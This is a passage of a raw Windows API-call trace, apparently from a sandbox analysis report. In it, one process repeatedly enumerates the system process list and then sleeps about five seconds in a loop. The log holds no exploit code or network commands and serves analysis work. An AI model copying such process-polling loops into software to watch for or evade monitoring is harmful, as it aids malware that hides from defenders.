BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.646] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.652] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.659] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.666] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.673] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.688] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.703] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.717] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.724] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.730] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.737] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.744] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.751] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.772] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 